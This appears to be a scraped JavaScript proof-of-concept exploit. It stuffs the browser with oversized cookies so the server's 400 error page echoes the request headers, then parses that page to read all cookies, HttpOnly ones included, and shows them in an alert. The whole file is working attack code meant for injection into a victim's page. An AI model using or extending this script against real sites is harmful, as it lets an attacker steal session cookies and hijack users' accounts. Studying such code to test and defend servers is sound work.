54 lines
No EOL
1.7 KiB
HTML
54 lines
No EOL
1.7 KiB
HTML
// Source: https://gist.github.com/1955a1c28324d4724b7b/7fe51f2a66c1d4a40a736540b3ad3fde02b7fb08
|
|
// Most browsers limit cookies to 4k characters, so we need multiple
|
|
function setCookies (good) {
|
|
// Construct string for cookie value
|
|
var str = "";
|
|
for (var i=0; i< 819; i++) {
|
|
str += "x";
|
|
}
|
|
// Set cookies
|
|
for (i = 0; i < 10; i++) {
|
|
// Expire evil cookie
|
|
if (good) {
|
|
var cookie = "xss"+i+"=;expires="+new Date(+new Date()-1).toUTCString()+"; path=/;";
|
|
}
|
|
// Set evil cookie
|
|
else {
|
|
var cookie = "xss"+i+"="+str+";path=/";
|
|
}
|
|
document.cookie = cookie;
|
|
}
|
|
}
|
|
|
|
function makeRequest() {
|
|
setCookies();
|
|
|
|
function parseCookies () {
|
|
var cookie_dict = {};
|
|
// Only react on 400 status
|
|
if (xhr.readyState === 4 && xhr.status === 400) {
|
|
// Replace newlines and match <pre> content
|
|
var content = xhr.responseText.replace(/\r|\n/g,'').match(/<pre>(.+)<\/pre>/);
|
|
if (content.length) {
|
|
// Remove Cookie: prefix
|
|
content = content[1].replace("Cookie: ", "");
|
|
var cookies = content.replace(/xss\d=x+;?/g, '').split(/;/g);
|
|
// Add cookies to object
|
|
for (var i=0; i<cookies.length; i++) {
|
|
var s_c = cookies[i].split('=',2);
|
|
cookie_dict[s_c[0]] = s_c[1];
|
|
}
|
|
}
|
|
// Unset malicious cookies
|
|
setCookies(true);
|
|
alert(JSON.stringify(cookie_dict));
|
|
}
|
|
}
|
|
// Make XHR request
|
|
var xhr = new XMLHttpRequest();
|
|
xhr.onreadystatechange = parseCookies;
|
|
xhr.open("GET", "/", true);
|
|
xhr.send(null);
|
|
}
|
|
|
|
makeRequest(); |